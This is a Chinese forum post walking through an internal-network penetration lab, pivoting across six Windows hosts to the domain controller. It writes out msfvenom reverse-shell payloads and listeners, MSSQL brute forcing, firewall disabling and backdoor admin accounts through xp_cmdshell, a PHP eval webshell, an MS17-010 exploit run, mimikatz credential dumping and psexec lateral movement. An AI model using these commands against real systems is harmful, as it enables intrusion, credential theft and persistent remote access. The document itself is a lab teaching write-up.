安全矩阵

 找回密码
 立即注册
搜索
查看: 944|回复: 0

内网渗透系列之域渗透深入弹shell开3389拿域控

[复制链接]

145

主题

192

帖子

817

积分

高级会员

Rank: 4

积分
817
发表于 2022-9-23 15:17:01 | 显示全部楼层 |阅读模式
​本文已首发于i春秋,仅作为实验参考,不属于任何技术文章,https://www.jianshu.com/p/2c49788239d4
实验目的:拿下一号机shell开3389远程登录

拓扑图
编辑

A组(靶场)


  1. <pre><code>1号</code><code>账号:Administrator</code><code>密码:Jack@!@#</code><code>ip:192.168.141.111</code>
  2. <code>2号</code><code>账号:ADMIN-PC/ADMIN</code><code>密码:123456hhhh.</code><code>222.18.158.244:7771</code><code>ip:192.168.141.138</code>
  3. <code>3号</code><code>域名:hiro.com</code><code>管理员</code><code>账号:hiro\administrator</code><code>密码:hb123456,./$</code><code>域用户</code><code>账号:hiro.com/user1</code><code>密码:hb123456,./$</code><code>ip:192.168.141.100</code>
  4. <code>Tips:里面设了静态ip,要改一下,已将加入过程总结</code><code>https://www.jianshu.com/p/2708f3dfb7cf</code>
  5. <code>4号</code><code>账号:administrator</code><code>密码:Win@2003</code><code>ip:192.168.141.114</code>
  6. <code>5号</code><code>账号:Administrator</code><code>密码:Win@2008</code><code>ip:192.168.141.115</code>
  7. <code>6号</code><code>账号:Administrator</code><code>密码:Edvison233!</code><code>ip:192.168.141.116</code></pre>
复制代码



B组(攻击组)
使用kali拿下2号机
通过MobaXterm连接Kali(ip:192.168.141.143),用户名:root,密码:toor
编辑

使用下述命令,执行,生成木马文件:
  1. <code class="hljs">msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -i 5 LHOST=192.168.141.143 LPORT=4444 -f exe > ./test.exe</code>
复制代码


编辑

生成了test.exe之后,然后在kali里,设定端口监听,等待目标上线
  1. <code class="hljs">msfconsole -x "use multi/handler; set PAYLOAD windows/meterpreter/reverse_tcp;show options; set LHOST 192.168.141.143;set LPORT 4444; run"</code>
复制代码


编辑

在2号机上右击,以管理员权限执行,kali就可以接收到反弹回来的shell,对shell进行操作。
编辑

在kali里接收到了shell,可在meterpreter中管理shell,开启3389
  1. <code class="hljs">run post/windows/manage/enable_rdp</code>
复制代码


添加用户
  1. <code class="hljs">run post/windows/manage/enable_rdp username="Waldo1111test" password="123456hhhh."</code>
复制代码


编辑

然后在服务器主机中,用新添加的账号,远程桌面连接2号机,至此完成了对2号机的控制
编辑

2号机到6号机
使用nmap扫描发现192.168.141.116开了1433端口
  1. <code class="hljs">nmap -p1433 --open 192.168.141.0/24</code>
复制代码


编辑

使用ms-sql-brute模块对6号机sa账户进行爆破,获得用户名为sa,密码为123456
  1. <code class="hljs">nmap -p 1433 --script ms-sql-brute --script-args userdb=C:\Users\Waldo1111test\Desktop\name.txt,passdb=C:\Users\Waldo1111test\Desktop\password.txt 192.168.141.116</code>
复制代码


编辑

使用sqltools获取6号机数据库
编辑

用xp_cmdshell关闭防火墙限制
  1. <code class="hljs">netsh firewall set opmode mode=disable</code>
复制代码


编辑

添加3389入站规则
  1. <code class="hljs">netsh advfirewall firewall add rule name="Remote Desktop" protocol=TCP dir=in localport=3389 action=allow</code>
复制代码


编辑

创建管理员用户Waldo6TEST


  1. <pre><code>net user Waldo6TEST 1234567hhhh. /add
  2. </code><code>net localgroup administrators Waldo6TEST /add</code></pre>
复制代码

编辑
编辑

使用用户名 Wado6TEST 密码 1234567hhhh. 成功登陆6号机
编辑

6号机到5号机
发现5号机开放80端口,是一个phpmyadmin,弱口令,用户名root,密码root
  1. <code class="hljs">http://192.168.141.115/phpmyadmin/</code>
复制代码


编辑

尝试写入webshell
  1. use mysql;
  2. CREATE TABLE `mysql`.`d0g3` (`sn00py` TEXT NOT NULL );
  3. INSERT INTO `mysql`.`d0g3` (`sn00py`)VALUES ('<?php @eval($_POST[c]);?>');
  4. SELECT sn00py FROM d0g3 INTO OUTFILE 'C:/pentest/phpstudy/WWW/shell.php';
复制代码


编辑

Shell写到了http://192.168.141.115/shell.php,使用菜刀连接
编辑

执行命令whoami,发现是administrator权限
编辑

加管理员用户
  1. <code>net user Waldo 1234567hhhh. /add</code><code>
  2. net localgroup administrators Waldo /add</code>
复制代码


打开5号机3389端口
  1. <code class="hljs">REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f</code>
复制代码


编辑

连接到远程桌面
编辑

5号机到4号机在5号机上传ms17010攻击脚本,用kali攻击机生成一个payload
  1. <code class="hljs">msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.141.143 lport=6666 -f exe -o shell.exe</code>
复制代码


开启msf监听
  1. <code>msfconsole -q</code><code>use exploit/multi/handler</code><code>set lhost 0.0.0.0</code><code>set lport 6666</code><code>exploit</code>
复制代码


5号机中cmd切换到C:\Users\Waldo\MS17-010-master,然后运行ms170101攻击脚本(脚本要自己下载)
  1. <code class="hljs">python zzz_exploit.py 192.168.141.114</code>
复制代码


编辑
编辑

在kali里接收到了shell,可在meterpreter中管理shell,开启3389
  1. <code class="hljs">run post/windows/manage/enable_rdp</code>
复制代码


添加用户
  1. <code class="hljs">run post/windows/manage/enable_rdp username="Waldo1111test" password="123456hhhh."</code>
复制代码


在5号机远程登录4号机
编辑

4号机到3号机
在4号机中抓取hash
  1. <code>privilege::debug
  2. </code><code>sekurlsa::logonpasswords</code>
复制代码


抓到域控管理员账号和密码:
编辑

在4号机上,使用以下命令建立IPC$连接
  1. <code class="hljs">net use \\192.168.141.100 "hb123456,./$" /user:"Administrator"</code>
复制代码


在4号机上,使用以下命令,将目标靶机的C盘映射到本地Z盘
  1. <code class="hljs">net use z: \\192.168.141.100\c$</code>
复制代码


编辑
编辑

使用copy命令将先前生成的shell.exe拷贝至靶机C盘
  1. <code class="hljs">copy shell.exe \\192.168.141.100\c$</code>
复制代码


编辑

在kali上开启监听(6666端口),使用psesec.exe启动靶机上的shell.exe
  1. <code class="hljs">psexec.exe \\192.168.141.100 -u administrator -p hb123456,./$ c:\\shell.exe</code>
复制代码


编辑

成功反弹shell上线:
编辑

在kali里接收到了shell,可在meterpreter中管理shell,开启3389
  1. <code class="hljs">run post/windows/manage/enable_rdp</code>
复制代码


添加用户
  1. <code class="hljs">run post/windows/manage/enable_rdp username="Waldo1111test" password="123456hhhh."</code>
复制代码


编辑

在4号机远程登录3号机,用户名:hiro\Administrator,密码:hb123456,./$
编辑

3号机到1号机
在3号机上,使用以下命令建立IPC$连接
  1. <code class="hljs">net use \\192.168.141.111 "hb123456,./$" /user:"Administrator"</code>
复制代码


编辑

在3号机上,使用以下命令,将目标靶机的C盘映射到本地Z盘
  1. <code class="hljs">net use z: \\192.168.141.111\c$</code>
复制代码


编辑
编辑

使用copy命令将先前生成的shell.exe拷贝至靶机C盘
  1. <code class="hljs">copy shell.exe \\192.168.141.111\c$</code>
复制代码


编辑
编辑

在kali上开启监听(6666端口),使用psexec.exe执行靶机上的shell.exe
  1. <code class="hljs">psexec.exe \\192.168.141.111 -u hiro\Administrator -p hb123456,./[        DISCUZ_CODE_1129        ]nbsp;c:\\shell.exe</code>
复制代码


编辑

成功获取shell
编辑

成功拿下1号机,使用用户名:hiro\Administrator,密码: hb123456,./$ 成功登陆1号机
编辑

回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

小黑屋|安全矩阵

GMT+8, 2024-3-29 06:20 , Processed in 0.016291 second(s), 18 queries .

Powered by Discuz! X4.0

Copyright © 2001-2020, Tencent Cloud.

快速回复 返回顶部 返回列表